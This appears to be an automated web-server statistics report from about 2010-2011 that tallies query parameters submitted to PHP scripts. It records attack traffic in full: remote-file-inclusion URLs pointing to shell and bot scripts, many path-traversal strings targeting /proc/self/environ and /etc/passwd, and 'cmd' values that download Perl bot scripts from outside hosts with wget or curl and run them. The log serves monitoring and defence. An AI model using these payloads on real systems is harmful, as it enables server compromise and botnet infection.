Parameter CONFIG_EXT[LANGUAGES_DIR]\r
ValueAccesses
2
Parameter CONFIG_EXT[LANGUAGES_DIR]http://211.236.244.133/~axlonaxlon/
shell.txt?
ValueAccesses
3
Parameter CONFIG_EXT[LANGUAGES_DIR]http://82.195.129.64/~magnadon/shel
l.txt?
ValueAccesses
1
Parameter CONFIG_EXT[LANGUAGES_DIR]http://abdclub.com/xcart/guide/work
ing_with_orders.txt?
ValueAccesses
1
OTHER: 1,709
ScriptTotal Accesses
/wusage/// 2,098
Parameters by Submitted Value
Parameter DIR_PREFIX
ValueAccesses
http://www.town-classifieds.com/adpics/baner.txt??? 2
http://www.lazar.ru/manager/processors/copyright.txt? ?? 1
Parameter DOCUMENT_ROOT
ValueAccesses
http://dk.fileave.com/heheh.txt???? 7
http://www.corretoresdeseguros.com.br/estatisticas/id1??? 3
http://190.81.28.182/incaware/id1.txt?? 2
Parameter GLOBALS
ValueAccesses
10
Parameter INCLUDE_FOLDER
ValueAccesses
http://www.jjdd.co.kr/nalog/plug_in_config/pro//id1??? 2
http://nic.bupt.edu.cn/media/j1.txt?? 1
http://www.c21vox.tv/id1.txt?? 1
http://surya1.fileave.com/id.txt?? 1
Parameter SERVER[DOCUMENT_ROOT]
ValueAccesses
http://www.kyokushin.hu/fx29id2.txt??? 1
Parameter _PHPLIB[libdir]
ValueAccesses
http://phamsight.com/docs/images/head?? 36
http://www.howtolisten.kr/lct/lib/list/respon1.txt? 7
http://www.howtolisten.kr/sarangbi_bgm/id1.txt? 7
http://nic.bupt.edu.cn/media/j1.txt?? 6
http://www.whinercentral.com/modules/Neos_Chronos/modules/ad
min/mawar.txt??????
5
http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? 4
http://nic.bupt.edu.cn/media/j1.txt??? 3
http://howtolisten.kr//sarangbi_bgm/id1.txt?? 3
http://tkosin.onmam.com/data/id1.txt?? 3
http://www.irishtoothache.com/id1.txt?????? 3
Parameter _REQUEST
ValueAccesses
10
Parameter _REQUEST[Itemid]
ValueAccesses
1 10
Parameter _REQUEST[option]
ValueAccesses
com_content 10
Parameter _SERVERDOCUMENT_ROOT
ValueAccesses
http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/fxid.txt? 1
OTHER: 1,959
ScriptTotal Accesses
/wusage/weekly/2011/01/09/ 2,076
Parameters by Submitted Value
Parameter Itemid
ValueAccesses
12 17
Parameter Option
ValueAccesses
com_myfiles 5
com_google 5
Parameter amp;view
ValueAccesses
..//..//..//..//..//..//..//..///proc/self/environ 00 4
Parameter controller
ValueAccesses
..//..//..//..//..//..//..//..///proc/self/environ 239
..//..//..//..//..//..//..//..///proc/self/environ 00 197
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ
165
../../../../../../../../../../../../../../../proc/self/envir
on
137
..//..//..//..//..//..//..//..//..//..//..///proc/self/envir
on
78
../../../../../../../../../../../../../../..//proc/self/envi
ron
45
../../../../../../../../../../../../../../../../../../../../
../../../..//proc/self/environ 00
43
../../../../../../../../../../..//proc/self/environ 00 35
../../../../../../../../../../..//proc/self/environ 00 20
../../../../../../../../../../../../..//proc/self/environ 00
17
Parameter option
ValueAccesses
com_google 848
com_fabrik 118
com_myblog 17
com_product 11
com_rwcards 11
com_goole 10
com_rwcards/?custompluginfile[]=../../../../../../../../../.
./../../../../../../../../../../../../../..//proc/self/envir
on 00
3
com_rwcards/?custompluginfile[]=../../../../../../../../../.
./../../..//proc/self/environ 00
2
com_rwcards/?custompluginfile[]=..//..//..//..//..//..//..//
..//..//..//..//..//..//..//proc/self/environ 00
1
com_pcchess 1
Parameter task
ValueAccesses
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ
9
../../../../../../../../../../../../../../../proc/self/envi
ron
3
../../../../../../../../../../../../../../../proc/self/envir
on
3
..//..//..//..//..//..//..//..///proc/self/environ 00 2
Parameter view
ValueAccesses
..//..//..//..//..//..//..//..///proc/self/environ 00 6
rwcards 1
OTHER: 23
ScriptTotal Accesses
/wusage/weekly/2010/12/12/ 2,051
Parameters by Submitted Value
Parameter Itemid
ValueAccesses
12 36
11 2
27 1
Parameter Option
ValueAccesses
com_google 4
Parameter amp;view
ValueAccesses
..//..//..//..//..//..//..//..///proc/self/environ 00 4
Parameter controller
ValueAccesses
..//..//..//..//..//..//..//..///proc/self/environ 299
..//..//..//..//..//..//..//..///proc/self/environ 00 176
../../../../../../../../../../../../../../../proc/self/envir
on
132
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ
96
..//..//..//..//..//..//..//..//..//..//..///proc/self/envir
on
71
../../../../../../../../../../../../../../../../../../../../
../../../..//proc/self/environ 00
46
../../../../../../../../../../../../../../..//proc/self/envi
ron
41
../../../../../../../../../../..//proc/self/environ 00 36
..//..//..//..//..//..//..//..//..//..//..///proc/self/z3n 20
//..//..//..//..//..//..//..//..///proc/self/environ 00 14
Parameter option
ValueAccesses
com_google 836
com_fabrik 110
com_myblog 39
com_goole 6
com_product 6
com_rwcards 4
com_rwcards/?custompluginfile[]=../../../../../../../../../.
./../../../../../../../../../../../../../..//proc/self/envir
on 00
1
Parameter task
ValueAccesses
..//..//..//..//..//..//..//..///proc/self/environ 00 18
../../../../../../../../../../../../../../../proc/self/envi
ron
11
../../../../../../../../../../../../../../../proc/self/envir
on
7
../../../../../../../../../../../../../../..//proc/self/envi
ron 00
1
../../../../../../../../../../../../../../../../../../../../
../../../..//proc/self/environ 00
1
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ
1
Parameter view
ValueAccesses
..//..//..//..//..//..//..//..///proc/self/environ 00 6
rwcards 1
OTHER: 25
ScriptTotal Accesses
/wusage/summary/cgi.html//transcripts.php 2,024
Parameters by Submitted Value
Parameter action
ValueAccesses
view 159
http://ownsirc.googlepages.com/botnet.txt? 30
http://www.oslutadores.com/?id=23530 28
http://www.freewebs.com/yahwek/phpbot.txt? 28
http://www.jungo8949.co.kr/tool25.txt? 23
20
http://www.neoncomanda.kit.net/tool25.dat? 18
http://www.pucorp.t5.com.br/lp.txt? 18
http://yahwek.dll.googlepages.com/phpbot.txt? 16
http://lol123.fileave.com/script9.txt?? 15
Parameter cmd
ValueAccesses
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc
h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br
/~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l
ynx http://eep.br/~gpereira/but.txt;perl but.txt
12
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch
http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7
1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly
nx http://201.37.71.117:8090/x.txt;perl x.txt
11
cd /tmp;rm botnet.txt;wget http://azume.zapto.org/botnet.txt
;fetch http://azume.zapto.org/botnet.txt;lwp-download http:/
/azume.zapto.org/botnet.txt;curl -O http://azume.zapto.org/b
otnet.txt;lynx http://azume.zapto.org/botnet.txt;perl botnet
.txt
8
cd /tmp;rm -rf ownz*;wget http://avastscript.kit.net/ownz.tx
t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt
p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava
stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own
z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz
.txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt*
7
cd /tmp;rm botnet.txt;wget http://fuckoff.no-ip.org/botnet.t
xt;fetch http://fuckoff.no-ip.org/botnet.txt;lwp-download ht
tp://fuckoff.no-ip.org/botnet.txt;curl -O http://fuckoff.no-
ip.org/botnet.txt;lynx http://fuckoff.no-ip.org/botnet.txt;p
erl botnet.txt
6
uname -a; id 5
cd /tmp;rm x.txt;wget http://www.killersofdragons.com/x.txt;
fetch http://www.killersofdragons.com/x.txt;lwp-download htt
p://www.killersofdragons.com/x.txt;curl -O http://www.killer
sofdragons.com/x.txt;lynx http://www.killersofdragons.com/x.
txt;perl x.txt
5
cd /tmp;rm bot.txt;wget http://189.24.138.40/bot.txt;fetch h
ttp://189.24.138.40/bot.txt;lwp-download http://189.24.138.4
0/bot.txt;curl -O http://189.24.138.40/bot.txt;lynx http://1
89.24.138.40/bot.txt;perl bot.txt;rm -rf *.txt
5
id 3
cd /tmp;wget http://www.1peninsulaintermedia.net/familytree/
bash/priv.txt;curl -O -f http://www.1peninsulaintermedia.net
/familytree/bash/priv.txt;lynx -source http://www.1peninsula
intermedia.net/familytree/bash/priv.txt;lwp-rget http://www.
1peninsulaintermedia.net/familytree/bash/priv.txt;fetch http
://www.1peninsulaintermedia.net/familytree/bash/priv.txt;per
l priv.txt;rm -rf priv.txt;rm -rf priv001.txt
3
Parameter deptid
ValueAccesses
1 155
http://204.11.228.115/id.txt? 4
Parameter list
ValueAccesses
1 1
Parameter search_string
ValueAccesses
http://www.fabiofotografo.com.br/js/var.txt?? 26
http://www.jungo8949.co.kr/tool25.txt? 23
http://201.37.71.117:8090/tool25.txt? 5
http://www.chamala.kit.net/tool25.txt? 4
http://usuarios.arnet.com.ar/larry123/safe.txt? 4
http://proxysx.t35.com/x0.txt? 4
http://xsenharox.xpg.com.br/e_sempre_nois.txt? 4
http://204.11.228.115/id.txt? 4
http://snock.host.sk/php.txt?? 3
http://piuri.net/images/logo3.gif?? 3
Parameter userid
ValueAccesses
0 155
OTHER: 1,209
ScriptTotal Accesses
/wusage/monthly/2011/01/01/ 2,017
Parameters by Submitted Value
Parameter Itemid
ValueAccesses
12 42
Parameter controller
ValueAccesses
..//..//..//..//..//..//..//..///proc/self/environ 255
..//..//..//..//..//..//..//..///proc/self/environ 00 216
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ
120
../../../../../../../../../../../../../../../proc/self/envir
on
108
../../../../../../../../../../..//proc/self/environ 00 75
..//..//..//..//..//..//..//..//..//..//..///proc/self/envir
on
73
../../../../../../../../../../../../../../..//proc/self/envi
ron
27
../../../../../../../../../../../../../../..//proc/self/envi
ron 00
16
../../../../../../../../../../../../../../../../../../../../
../../../..//proc/self/environ 00
15
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
..//..//..//..//..//..//..//..//..///proc/self/environ 00
13
Parameter option
ValueAccesses
com_google 772
com_rokdownloads 54
com_rwcards 43
com_myblog 42
com_fabrik 32
com_juser 13
com_gcalendar 12
com_product 6
com_jajobboard 2
com_rwcards/?custompluginfile[]=../../../../../../../../../.
./../../../../../../../../../../../../../..//proc/self/envir
on 00
1
Parameter task
ValueAccesses
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ
40
../../../../../../../../../../../../..//proc/self/environ 00
2
Parameter view
ValueAccesses
rwcards 20
OTHER: 18
ScriptTotal Accesses
/wusage/summary/cgi.html//phplive/setup/header.php 2,016
Parameters by Submitted Value
Parameter ?v
ValueAccesses
1
Parameter cmd
ValueAccesses
cd /tmp;lwp-download http://h1.ripway.com/tsk4/botx2.txt;per
l botx2.txt;rm -rf *txt*
17
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch
http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7
1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly
nx http://201.37.71.117:8090/x.txt;perl x.txt
13
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc
h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br
/~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l
ynx http://eep.br/~gpereira/but.txt;perl but.txt
11
cd /tmp;lwp-download http://h1.ripway.com/cmdtsk/botx2.txt;p
erl botx2.txt;rm -rf *txt*
11
cd /tmp;lwp-download http://h1.ripway.com/arroba5/botx.txt;p
erl botx.txt;rm -rf *botx*
10
cd /tmp;wget http://206.71.148.32/anaozao.txt;curl -O -f htt
p://206.71.148.32/anaozao.txt;lynx -source http://206.71.148
.32/anaozao.txt;lwp-rget http://206.71.148.32/anaozao.txt;fe
tch http://206.71.148.32/anaozao.txt;perl anaozao.txt;rm -rf
anaozao.txt
10
cd /tmp;wget http://h1.ripway.com/tsk4/botx2.txt;perl botx2.
txt;rm -rf *txt*
9
uname -a; id 8
cd /tmp;wget http://208.100.59.56/nanaozin.txt;curl -O -f ht
tp://208.100.59.56/nanaozin.txt;lynx -source http://208.100.
59.56/nanaozin.txt;lwp-rget http://208.100.59.56/nanaozin.tx
t;fetch http://208.100.59.56/nanaozin.txt;perl nanaozin.txt;
rm -rf nanaozin.txt
7
cd /tmp;rm botnet.txt;wget http://azume.zapto.org/botnet.txt
;fetch http://azume.zapto.org/botnet.txt;lwp-download http:/
/azume.zapto.org/botnet.txt;curl -O http://azume.zapto.org/b
otnet.txt;lynx http://azume.zapto.org/botnet.txt;perl botnet
.txt
7
Parameter css_path
ValueAccesses
http://www.jungo8949.co.kr/tool25.txt? 76
http://h1.ripway.com/tsk4/cmd.txt? 40
http://catholique-sartrouville-78.cef.fr/IMG/dna.txt 33
http://houdateamo.altervista.org/dna.txt 28
http://yahwek.dll.googlepages.com/phpbot.txt? 27
http://www.diabinhoinfernal.kit.net/iLeGaiS/tool25.txt? 26
http://www.jungo8949.co.kr./tool25.txt? 25
http://www.capsoir.com/images/TRA.txt? 22
http://www.bergenfest.no/vnc/cmd.txt? 19
http://www.geneseobeadstudio.com/cmds.txt? 19
Parameter list
ValueAccesses
1 1
OTHER: 1,596
ScriptTotal Accesses
/wusage/summary/cgi.html//phplive/message_box.php 1,954
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm -rf ownz*;wget http://avastscript.kit.net/ownz.tx
t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt
p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava
stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own
z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz
.txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt*
13
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch
http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7
1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly
nx http://201.37.71.117:8090/x.txt;perl x.txt
11
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc
h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br
/~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l
ynx http://eep.br/~gpereira/but.txt;perl but.txt
11
cd /tmp;rm botnet.txt;wget http://azume.zapto.org/botnet.txt
;fetch http://azume.zapto.org/botnet.txt;lwp-download http:/
/azume.zapto.org/botnet.txt;curl -O http://azume.zapto.org/b
otnet.txt;lynx http://azume.zapto.org/botnet.txt;perl botnet
.txt
7
cd /tmp;rm botnet.txt;wget http://fuckoff.no-ip.org/botnet.t
xt;fetch http://fuckoff.no-ip.org/botnet.txt;lwp-download ht
tp://fuckoff.no-ip.org/botnet.txt;curl -O http://fuckoff.no-
ip.org/botnet.txt;lynx http://fuckoff.no-ip.org/botnet.txt;p
erl botnet.txt
6
cd /tmp;rm x.txt;wget http://www.killersofdragons.com/x.txt;
fetch http://www.killersofdragons.com/x.txt;lwp-download htt
p://www.killersofdragons.com/x.txt;curl -O http://www.killer
sofdragons.com/x.txt;lynx http://www.killersofdragons.com/x.
txt;perl x.txt
5
cd /tmp;rm bot.txt;wget http://189.24.138.40/bot.txt;fetch h
ttp://189.24.138.40/bot.txt;lwp-download http://189.24.138.4
0/bot.txt;curl -O http://189.24.138.40/bot.txt;lynx http://1
89.24.138.40/bot.txt;perl bot.txt;rm -rf *.txt
5
id 4
uname -a; id 4
cd /tmp;rm bot.txt;wget http://www.3sk3nt.by.ru/bot.txt;fetc
h http://www.3sk3nt.by.ru/bot.txt;lwp-download http://www.3s
k3nt.by.ru/bot.txt;curl -O http://www.3sk3nt.by.ru/bot.txt;l
ynx http://www.3sk3nt.by.ru/bot.txt;perl bot.txt
3
Parameter deptid
ValueAccesses
http://www.jungo8949.co.kr/tool25.txt? 23
http://www.fabiofotografo.com.br/js/var.txt?? 10
http://201.37.71.117:8090/tool25.txt? 5
http://204.11.228.115/id.txt? 4
http://xsenharox.xpg.com.br/e_sempre_nois.txt? 4
http://www.chamala.kit.net/tool25.txt? 4
http://proxysx.t35.com/x0.txt? 4
http://snock.host.sk/php.txt?? 3
http://www.hotelalpino.com.br/ferias/vnc/cmd/cmd.txt? 3
http://pucorp.org/pbot.txt? 3
Parameter l
ValueAccesses
ezpub 135
http://204.11.228.115/id.txt? 4
Parameter list
ValueAccesses
1 1
Parameter theme
ValueAccesses
158
http://ownsirc.googlepages.com/botnet.txt? 30
http://www.freewebs.com/yahwek/phpbot.txt? 28
http://www.oslutadores.com/?id=23530 28
http://www.jungo8949.co.kr/tool25.txt? 21
http://www.neoncomanda.kit.net/tool25.dat? 19
http://www.pucorp.t5.com.br/lp.txt? 18
http://www.capsoir.com/images/TRA.txt? 16
http://yahwek.dll.googlepages.com/phpbot.txt? 15
http://204.11.228.115/id.txt? 15
Parameter x
ValueAccesses
1 131
http://204.11.228.115/id.txt? 4
OTHER: 1,199
ScriptTotal Accesses
///// 1,942
Parameters by Submitted Value
Parameter DOCUMENT_ROOT
ValueAccesses
http://www.samjinenginc.com/board/readme.txt??? 3
http://www.austria-skitest.com/snowkids/baner.txt?? 1
http://www.logica-tech.com/foto/baner.txt?? 1
http://www.knotnilla.com/images/id1.txt?? 1
Parameter INCLUDE_FOLDER
ValueAccesses
http://bagoesss.fileave.com/id1.txt???? 3
Parameter Itemid
ValueAccesses
12 15
Parameter Option
ValueAccesses
com_myblog 3
Parameter _SERVER[DOCUMENT_ROOT]
ValueAccesses
http://hirlevel.uw.hu/Ckrid1.txt?? 12
http://www.redseafish.ru/forum//xs_mod/tpl/ver1? 10
http://phamsight.com/docs/images/head??? 9
http://nic.bupt.edu.cn/media/id1.txt??? 9
http://musicadelibreria.net/footer?? 9
http://aglifestylesmarketplace.com/AinuLid1.txt?? 8
http://kf-house.huco-tnm.com/syssite/include/js/calendar/inc
lude/dategif/ipays/id1.txt???
7
http://dongja.booktobi.com//bbs/id1.txt? 7
http://200.199.242.22/images/.ajim/ajim1.txt???? 7
http://wenda.zoomshare.com/files/feelscanz.txt????? 7
Parameter _zb_path
ValueAccesses
http://www.koreadefence.net/data/shirohige/zfxid.txt?? 5
http://www.princedent.com/bbs/set_up/1.txt???? 4
http://www.abruzzobooking.it/mambots/idxx.txt?? 4
http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? 4
http://www.abruzzobooking.it/mambots/idxx.txt? ? 2
http://yeshouse.mk.co.kr/education/p1.txt??? 1
http://i0.co.kr/i0mall//admin/tukulid.txt?? 1
http://creative-alchemy.com/zencart//media/id1.txt?? 1
http://bwbministries.com/images/r8_c11.gif??? 1
Parameter controller
ValueAccesses
../../../../../../../../../../../../../../../proc/self/envir
on
280
..//..//..//..//..//..//..//..///proc/self/environ 00 123
../../../../../../../../../../../../../../../../../../../../
../../../..//proc/self/environ 00
104
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ
73
../../../../../../../../../../../../..//proc/self/environ 00
46
../../../../../../../../../../../../../../../../../../../../
../../../../proc/self/environ 00
30
../../../../../../../../../../../../../../..//proc/self/envi
ron 00
9
....//....//....//....//....//....//....//....//proc/self/en
viron 00
4
./../../../../../../../../etc/passwd 1
../../../../../../../../../../proc/self/environ 00 1
Parameter custompluginfile[]
ValueAccesses
http://www.yak.com.pl/id1.txt? 1
Parameter id.gallery.php?path
ValueAccesses
http://www.hackclub.com.ar/javascript//id1.txt? 1
Parameter language_id
ValueAccesses
http://www.seoul10.org/zerobd/gg_late/copyme.txt?? 1
OTHER: 1,133
ScriptTotal Accesses
/wusage/monthly/2010/10/01/ 1,906
Parameters by Submitted Value
Parameter Option
ValueAccesses
com_google 5
Parameter amp;view
ValueAccesses
..//..//..//..//..//..//..//..///proc/self/environ 00 4
Parameter controller
ValueAccesses
../../../../../../../../../../../../../../../proc/self/envir
on
353
..//..//..//..//..//..//..//..///proc/self/environ 212
..//..//..//..//..//..//..//..///proc/self/environ 00 141
../../../../../../../../../../../../../../../../../../../../
../../../..//proc/self/environ 00
67
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ
53
..//..//..//..//..//..//..//..//..//..//..///proc/self/envir
on
38
..//..//..//..//..//..//..//..//..//..//..///proc/self/z3n 24
//..//..//..//..//..//..//..//..///proc/self/environ 00 22
../../../../../../../../../../../../../../..//proc/self/envi
ron
19
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
..//..//..//..//..//..//..//..//..///proc/self/environ 00
10
Parameter option
ValueAccesses
com_google 938
com_fabrik 10
Parameter view
ValueAccesses
..//..//..//..//..//..//..//..///proc/self/environ 00 6
OTHER: 4
ScriptTotal Accesses
/wusage/summary/cgi.html/components/com_performs/performs.ph
p
1,869
Parameters by Submitted Value
Parameter
ValueAccesses
http://boneunix.by.ru/good.txt? 1
Parameter cmd
ValueAccesses
cd /tmp;rm ng*;wget http://ownz-you.com/ng.txt;fetch http://
ownz-you.com/ng.txt;lwp-download http://ownz-you.com/ng.txt;
curl -O http://ownz-you.com/ng.txt;lynx http://ownz-you.com/
ng.txt;perl ng.txt;rm -rf ng*
8
cd /tmp;rm x.txt;wget http://baixinho.we.bs/x.txt;fetch http
://baixinho.we.bs/x.txt;lwp-download http://baixinho.we.bs/x
.txt;curl -O http://baixinho.we.bs/x.txt;lynx http://baixinh
o.we.bs/x.txt;perl x.txt
5
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch
http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7
1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly
nx http://201.37.71.117:8090/x.txt;perl x.txt
5
cd /tmp;rm root.txt;wget www.3sk3nt.kit.net/root.txt;fetch w
ww.3sk3nt.kit.net/root.txt;lwp-download www.3sk3nt.kit.net/r
oot.txt;curl -O www.3sk3nt.kit.net/root.txt;lynx www.3sk3nt.
kit.net/root.txt;perl root.txt
4
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://www.anje.pt/ip1.txt;wget http://www.anje.pt/ros1.txt;w
get http://www.anje.pt/scanasc.txt;curl -o ip1.txt http://ww
w.anje.pt/ip1.txt;curl -o ros1.txt http://www.anje.pt/ros1.t
xt;curl -o scanasc.txt http://www.anje.pt/scanasc.txt;perl i
p1.txt;perl ros1.txt;perl scanasc.txt
3
killall -9 perl;rm spriter1.txt;wget http://www.hobbiz.com/U
P/spriter1.txt;curl -o spriter1.txt http://www.hobbiz.com/UP
/spriter1.txt;perl spriter1.txt
3
cd /tmp;rm bot123ffiii.txt;wget www.xsenharox.xpg.com.br/bot
123ffiii.txt;fetch www.xsenharox.xpg.com.br/bot123ffiii.txt;
lwp-download www.xsenharox.xpg.com.br/bot123ffiii.txt;curl -
O www.xsenharox.xpg.com.br/bot123ffiii.txt;lynx www.xsenharo
x.xpg.com.br/bot123ffiii.txt;perl bot123ffiii.txt
3
uname -a; id 3
cd /tmp;rm ful.txt;wget http://71.41.190.203/ful.txt;fetch h
ttp://71.41.190.203/ful.txt;lwp-download http://71.41.190.20
3/ful.txt;curl -O http://71.41.190.203/ful.txt;lynx http://7
1.41.190.203/ful.txt;perl ful.txt;rm -rf ful.txt*
3
wget http://www.hobbiz.com/UP/spriter1.txt;curl -o spriter1.
txt http://www.hobbiz.com/UP/spriter1.txt;perl spriter1.txt
3
Parameter list
ValueAccesses
1 3
Parameter mosConfig_absolute_path
ValueAccesses
http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/ima
ges/.asc/www?????????????????????????????
40
http://www.dunakom.hu/userimages/id.txt? 31
http://ownsirc.googlepages.com/botnet.txt? 26
http://xredrum.com/id.txt? 24
http://208.74.174.183/brizola.txt? 20
http://www.mta.cl/galeria2/galery.txt? 18
http://201.37.71.117:8090/cmd.txt?? 17
ftp://84.32.137.157/incoming/upload/trem/oldbisok?? 16
http://arabx1st.iifree.net/safe.txt?? 15
http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? 15
Parameter nst
ValueAccesses
whoami 1
OTHER: 1,602
ScriptTotal Accesses
/wusage/summary/cgi.html//message_box.php 1,810
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm -rf ownz*;wget http://avastscript.kit.net/ownz.tx
t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt
p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava
stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own
z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz
.txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt*
13
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc
h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br
/~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l
ynx http://eep.br/~gpereira/but.txt;perl but.txt
12
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch
http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7
1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly
nx http://201.37.71.117:8090/x.txt;perl x.txt
11
cd /tmp;rm botnet.txt;wget http://azume.zapto.org/botnet.txt
;fetch http://azume.zapto.org/botnet.txt;lwp-download http:/
/azume.zapto.org/botnet.txt;curl -O http://azume.zapto.org/b
otnet.txt;lynx http://azume.zapto.org/botnet.txt;perl botnet
.txt
7
cd /tmp;rm botnet.txt;wget http://fuckoff.no-ip.org/botnet.t
xt;fetch http://fuckoff.no-ip.org/botnet.txt;lwp-download ht
tp://fuckoff.no-ip.org/botnet.txt;curl -O http://fuckoff.no-
ip.org/botnet.txt;lynx http://fuckoff.no-ip.org/botnet.txt;p
erl botnet.txt
6
cd /tmp;rm bot.txt;wget http://189.24.138.40/bot.txt;fetch h
ttp://189.24.138.40/bot.txt;lwp-download http://189.24.138.4
0/bot.txt;curl -O http://189.24.138.40/bot.txt;lynx http://1
89.24.138.40/bot.txt;perl bot.txt;rm -rf *.txt
5
uname -a; id 4
cd /tmp;rm x.txt;wget http://www.killersofdragons.com/x.txt;
fetch http://www.killersofdragons.com/x.txt;lwp-download htt
p://www.killersofdragons.com/x.txt;curl -O http://www.killer
sofdragons.com/x.txt;lynx http://www.killersofdragons.com/x.
txt;perl x.txt
4
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/tools/peml
k.txt;fetch http://pemlk.iespana.es/tools/pemlk.txt;lwp-down
load http://pemlk.iespana.es/tools/pemlk.txt;curl -O http://
pemlk.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.e
s/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt?
3
cd /tmp;rm bot.txt;wget http://www.3sk3nt.by.ru/bot.txt;fetc
h http://www.3sk3nt.by.ru/bot.txt;lwp-download http://www.3s
k3nt.by.ru/bot.txt;curl -O http://www.3sk3nt.by.ru/bot.txt;l
ynx http://www.3sk3nt.by.ru/bot.txt;perl bot.txt
3
Parameter l
ValueAccesses
admin 130
http://204.11.228.115/id.txt? 4
Parameter list
ValueAccesses
1 1
Parameter theme
ValueAccesses
153
http://ownsirc.googlepages.com/botnet.txt? 31
http://www.freewebs.com/yahwek/phpbot.txt? 28
http://www.oslutadores.com/?id=23530 28
http://www.jungo8949.co.kr/tool25.txt? 22
http://www.neoncomanda.kit.net/tool25.dat? 19
http://www.pucorp.t5.com.br/lp.txt? 18
http://www.capsoir.com/images/TRA.txt? 16
http://204.11.228.115/id.txt? 15
http://yahwek.dll.googlepages.com/phpbot.txt? 15
Parameter x
ValueAccesses
http://www.jungo8949.co.kr/tool25.txt? 22
http://www.fabiofotografo.com.br/js/var.txt?? 10
http://201.37.71.117:8090/tool25.txt? 5
http://xsenharox.xpg.com.br/e_sempre_nois.txt? 4
http://proxysx.t35.com/x0.txt? 4
http://204.11.228.115/id.txt? 4
http://www.chamala.kit.net/tool25.txt? 4
http://snock.host.sk/php.txt?? 3
http://www.hotelalpino.com.br/ferias/vnc/cmd/cmd.txt? 3
http://freewebtown.com/trabalho/CMD.txt? 3
OTHER: 1,200
ScriptTotal Accesses
/wusage/summary/cgi.html//modules/AllMyGuests/signin.php 1,809
Parameters by Submitted Value
Parameter _AMGconfig[cfg_serverpath]
ValueAccesses
http://64.22.125.219/r0x/id.txt??? 64
http://www.jolieloves.com/mori/cmd.txt? 53
http://189.23.251.131/~tiago/new.txt? 52
http://211.236.244.133/~axlonaxlon/cmd.txt? 26
http://files.myopera.com/Towu614520/files/own.txt? 22
http://www.freewebs.com/yahwek/sete.txt? 20
http://sigbr.servegame.com:8080/mydick.txt? 19
19
http://www.vsm.gov.tr/pwnd/http.txt?? 18
http://own.741.com/mydick.txt? 18
Parameter _AMGconfig[cfic.php?p
ValueAccesses
http://www.freewebs.com/h1h1h1/p.txt?? 5
http://www.freewebs.com/t420/p.txt?? 5
http://www.rj2009.kit.net/ddd.txt? 4
http://www.rj2008.kit.net/p.txt?? 3
http://www.freewebs.com/playssonn/p.txt?? 3
http://www.rj2009.kit.net/p.txt? 2
http://www.chapolin-ownz.us/inbox.txt? 1
http://www.rj2009.kit.net/ddd.txt?? 1
http://www.rj2009.kit.net/p.txt?? 1
http://www.freewebs.com/b0mb4do1337/p.txt?? 1
Parameter cmd
ValueAccesses
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch
http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7
